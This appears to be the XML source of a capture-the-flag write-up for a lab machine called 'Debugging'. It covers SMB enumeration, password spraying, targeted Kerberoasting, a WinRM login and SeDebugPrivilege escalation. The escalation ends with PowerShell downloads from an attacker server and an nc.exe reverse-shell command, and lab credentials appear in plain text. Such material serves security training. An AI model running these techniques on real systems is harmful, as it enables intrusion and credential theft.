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1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:after="120" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fltw7z571btl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9l2lsbw3fbz5" w:id="1"/>
      <w:bookmarkEnd w:id="1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Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7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Debugging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machine. If you need support, please open a ticket in the.</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.d6fo8h5oxdbv" w:id="2"/>
      <w:bookmarkEnd w:id="2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Reconnaissance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port enumeration was performed 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RustScan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identify the ports exposed by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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rustscan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-sV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--min-rate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87700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="69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RustScan enumeration identified the exposed TCP ports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88 (Kerberos), 445 (SMB), 5985 (WinRM), and 3389 (RDP)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When enumerating port 445 (SMB) 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nxc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tool, the service responded, but authentication was not possible since no valid username/password credentials were available and access was denied.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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--shares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27300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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SMB service allows anonymous authentication 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guest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user without requiring a password. During testing, it was possible to successfully establish a connection and enumerate permissions using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--shares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option in nxc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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analysis confirmed that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guest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user has read permissions on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general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IPC$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shares, allowing viewing of available content in those directories.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''--shares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89313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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9313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Continuing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nxc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spider_plus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module was used, allowing enumeration of files for which the user has read permissions within the available shares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guest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spider_plus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993900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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00100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="72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nxc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tool generates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.json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file containing the results obtained by the spider_plus module, including the list of enumerated files and their respective metadata.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generated file is located in the directory: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/home/&lt;your-user&gt;/.nxc/modules/nxc_spider_plus/&lt;machine-ip&gt;.json,.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After formatting the output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jq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Welcome.txt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located in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general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directory.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06500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="75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6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smbclient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to access the directory, we were able to download the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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smbclient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//172.16.1.6/general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guest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Welcome.txt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844800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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file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Welcome.txt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is a corporate document containing the default password format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Debugging[EntryYear]!@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 It also lists two identified users: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Vitiex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Hudson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Debugging[EntryYear]!@</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038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Ex: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Debugging2020!@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rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474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187700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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default password format known and the accounts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Vitiex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and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Hudson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identified, a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password spray attack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could be performed against these accounts. The attack uses this technique to identify valid credentials by attempting multiple passwords against one or more valid user accounts. A file named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user.txt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created containing the identified users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E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092200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="77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22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A wordlist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pass.txt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was generated containing variations of the pattern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Debugging[EntryYear]!@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Examples generated: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Debugging2020!@, Debugging2021!@, Debugging2022!@.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The list was built using a Python script on the attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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numbers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range(2000,2026):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ab/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print(f"Debugging{numbers}!@")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298700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="84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98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the user list and generated wordlist, a password spray attack was executed against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SMB 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using nxc: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smb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user.txt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pass.txt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--continue-on-success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1200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49400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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9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60500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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0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attack revealed valid credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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hudson:Debugging2019!@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With Hudson’s credentials, we verified accessible services and permissions on the target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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account has permission to access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LDAP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allowing directory queries and maintenance operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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ldap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hudson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'Debugging2019!@'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12800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="85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12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jc w:val="both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1155cc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After verifying user access, it is possible to extract the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LDAP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data using the following tools:</w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="37474f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23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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nxc</w:t>
        </w:r>
      </w:hyperlink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or</w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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ldapdomaindump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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f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nxc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tool was used to extract directory information via LDAP, generating a compressed file in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.zip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format in the directory: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>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="37474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/home/&lt;your-user&gt;/.nxc/logs/&lt;your-file&gt;_bloodhound.zip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ldap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--dns-server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&lt;machine-ip&gt;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hudson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'Debugging2019!@'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--bloodhound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--collection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104900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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04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From this point, the tool</w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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BloodHound</w:t>
        </w:r>
      </w:hyperlink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was used to map and analyze the Active Directory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644900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="88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49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connection was established in the tool using the credentials obtained during the installation, and subsequently, the previously generated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.zip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file was uploaded.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17800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="89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After loading all the files into BloodHound, the user HUDSON@DEBUGGING.CORP was selected.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514600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="90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4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768600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="91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Upon analyzing the permissions of the user HUDSON@DEBUGGING.CORP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3670300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="92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Rule="auto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GenericWrite permission allows the user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HUDSON@DEBUGGING.CORP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 modify several attributes of the user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SVC_DEBUG,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such as groups, descriptions, and logon scripts, enabling actions that can lead to privilege escalation.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However, this permission does not include sensitive controls, such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ResetPassword,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which prevents direct password reset or full account control.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an attacker obtains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GenericWrite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over a user, they can write to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servicePrincipalNames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attribute and immediately initiate a targeted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Kerberoasting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attack.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917700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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7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 um ataque</w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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Kerberoasting</w:t>
        </w:r>
      </w:hyperlink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direcionado, é possível provocar a emissão de um ticket de serviço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(TGS)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a conta alvo e obter o hash do conteúdo criptografado desse ticket.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Ao quebrar esse hash, obtemos credenciais que possibilitam acesso a outros serviços.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targetedKerberoast.py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--dc-ip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'&lt;machine-ip&gt;'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-v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'debugging.corp'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'hudson'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'Debugging2019!@'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22400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="57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24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Hashcat to identify the format, we verified that the hash corresponds to mode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13100 (Kerberos 5 TGS-REP, etype 23)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Next, we executed Hashcat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-m 13100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 crack the password.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–identify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384300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="58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84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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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credentials of the service account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svc_debug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were obtained.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hashcat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13100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hashes.txt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wordlist.txt).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!!!Saaliegah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35100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="59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35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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8yggsox1ibv" w:id="3"/>
      <w:bookmarkEnd w:id="3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Exploitation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user flag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valid credentials for a service account, an attacker could authenticate as that service, or another service, and potentially escalate privileges or move laterally within the domain, depending on the permissions associated with the account.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recovering the credential for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svc_debug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service account, we tested authentication on Windows remote management services such as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WinRM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nxc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tool shows us that we have access to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WinRM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nxc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$ip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'svc_debug'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'!!!Saaliegah'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81100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="60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1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After validating the credentials for the service account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svc_debug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we established a remote session with the target host using</w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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 </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId42">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">evil-winrm</w:t>
        </w:r>
      </w:hyperlink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0" w:lineRule="auto"/>
        <w:jc w:val="both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evil-winrm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172.16.15.36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svc_debug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'!!!Saaliegah'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117600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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7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in this way, we have remote access to the system, and we can also view the user flag.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95500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.jxadhyewbs37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jc w:val="both"/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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.l5wmxrus9yvf" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation – Obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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Upon executing the command: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whoami /priv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we verified that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SeDebugPrivilege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is enabled, allowing the user to debug and access system processes.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SeDebugPrivilege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(Debug programs)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— allows opening any process (including system processes) and can be used to extract credentials from memory or inject code.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whoami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/priv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070100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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To exploit this privilege, two files were transferred to the host  </w:t>
      </w:r>
      <w:hyperlink r:id="rId46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nc.exe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and thescript </w:t>
      </w:r>
      <w:hyperlink r:id="rId47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">psgetsys.ps1</w:t>
        </w:r>
      </w:hyperlink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;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both were previously downloaded to our attack machine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257300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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73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 uploaded a Python server on our attack machine to host the files.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python3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http.server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80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25500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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files were downloaded to the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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(New-Object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Net.WebClient).DownloadFile('http://&lt;your-ip&gt;/nc.exe',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'C:\Users\svc_debug\Desktop\nc.exe')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(New-Object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Net.WebClient).DownloadFile('http://&lt;your-ip&gt;/psgetsys.ps1',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'C:\Users\svc_debug\Desktop\psgetsys.ps1')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574800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="67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74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889000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="76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IEX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we loaded the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psgetsys.ps1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script into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PowerShell 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 and validated that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ImpersonateFromParentPid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function was present in the environment.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we located the winlogon process as the target for the actions.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IEX(Get-Content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.\psgetsys.ps1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-Raw)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Get-Command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ImpersonateFromParentPid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Get-Process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winlogon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0" w:lineRule="auto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2044700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="78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7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240" w:before="240" w:lineRule="auto"/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The function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ImpersonateFromParentPid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 creates a child process from the parent PID, causing the new process to inherit the privileges of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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">winlogon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, effectively running with Administrator privileges.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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1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We invoke the process of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PID 776 (winlogon.exe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) passing the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nc.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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 binary as an argument, which started to be executed with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator privileges.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ImpersonateFromParentPid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-ppid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776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-command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"c:\windows\system32\cmd.exe"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-cmdargs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"/c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C:\Users\svc_debug\Desktop\nc.exe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&lt;your-ip&gt;-e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cmd.exe"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419100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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1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1498600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="83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86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With this, it was possible to obtain a shell with maximum privilege, access the Administrator's Desktop and obtain the final flag with the command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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D3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0" w:lineRule="auto"/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type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root.txt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Fonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3352800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="86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2800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/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>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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sectPr>
      <w:headerReference r:id="rId56" w:type="default"/>
      <w:headerReference r:id="rId57" w:type="first"/>
      <w:headerReference r:id="rId58" w:type="even"/>
      <w:footerReference r:id="rId59" w:type="default"/>
      <w:footerReference r:id="rId60" w:type="first"/>
      <w:footerReference r:id="rId61" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBold">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId9" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId10" w:subsetted="0"/>
    <w:embedItalic w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId11" w:subsetted="0"/>
    <w:embedBoldItalic w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1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0">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025 Hacking Club |All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                         Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"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A">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.uj30kgtw98s1" w:id="6"/>
    <w:bookmarkEnd w:id="6"/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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="6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28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221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DC"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120" w:before="360" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32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D">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image3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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="66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8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729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56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90550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651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  <w:t xml:space="preserve">Writeup - Debugging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120" w:before="480" w:line="275.9999942779541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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3015679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="56" name="image39.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image39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686550" cy="3015679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F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rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
